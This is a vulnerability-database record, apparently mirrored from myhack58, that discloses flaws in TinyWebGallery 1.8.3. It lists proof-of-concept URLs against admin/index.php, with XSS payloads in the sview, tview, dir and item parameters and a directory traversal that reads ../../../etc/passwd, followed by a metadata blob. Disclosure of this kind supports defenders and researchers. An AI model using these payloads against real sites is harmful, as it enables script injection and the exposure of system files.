ID MYHACK58:62201128979
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00
Description
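TinyWebGallery is a PHP photo album program. TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal and XSS, which may lead to sensitive information disclosure. The proof-of-concept URLs below all target admin/index.php: the sview, tview, dir and item parameters are used for the XSS cases, and the item parameter of the edit action is used for the directory traversal case.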
[+]info:
~~~~~~~~~
Script: TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com
[+]poc:
~~~~~~~~~
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String. fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String. fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=<script>alert("xss ")</script>
http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss ")</script>
http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss ")</script>
http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16090
{"hash": "8bdc4fa30f42ee0b9233599d9f8d6a05c486252ab7aef51618a62853acf77327", "id": "MYHACK58:62201128979", "modified": "2011-02-04T00:00:00", "history": [], "published": "2011-02-04T00:00:00", "type": "myhack58", "edition": 1, "references": [], "objectVersion": "1.2", "href": "http://www.myhack58.com/Article/html/3/62/2011/28979.htm", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-15T18:01:37"}, "dependencies": {"references": [], "modified": "2016-11-15T18:01:37"}, "vulnersScore": -0.0}, "cvelist": [], "title": "TinyWebGallery 1.8.3 version multiple vulnerabilities-vulnerability warning-the black bar safety net", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "43d14a68e65cda8dbac32e48f14d5792", "key": "description"}, {"hash": "351115df0820c6132c0c2bc7b5652d87", "key": "href"}, {"hash": "137d35f4e9efd8e88a7eefc8ee8b417d", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "137d35f4e9efd8e88a7eefc8ee8b417d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "6ff8908dcc6fcd3e2e4b1b21ac310398", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "viewCount": 0, "description": "TinyWebGallery is a php photo album program, TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal and[XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>), may lead to sensitive information disclosure. \n\n[+]info: \n~~~~~~~~~ \nScript: TinyWebGallery \nVersion: 1.8.3 (No fixes yet, might work on other versions too). \nHome: http://www.tinywebgallery.com \n\n[+]poc: \n~~~~~~~~~ \nhttp://localhost/twg183/admin/index.php?sview=\"onmouseover=alert(String. 
fromCharCode(88,83,83));\" \nhttp://localhost/twg183/admin/index.php?tview=\"onmouseover=alert(String. fromCharCode(88,83,83));\" \nhttp://localhost/twg183/admin/index.php?dir=<script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \nhttp://localhost/twg183/admin/index.php?action=chmod&item=<script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \nhttp://localhost/twg183/twg183/admin/index.php?action=chmod&item=\"><script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \n\nhttp://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd \n\n[+]Reference: \n~~~~~~~~~ \nhttp://www.exploit-db.com/exploits/16090 \n", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-11-15T18:01:37"}
{}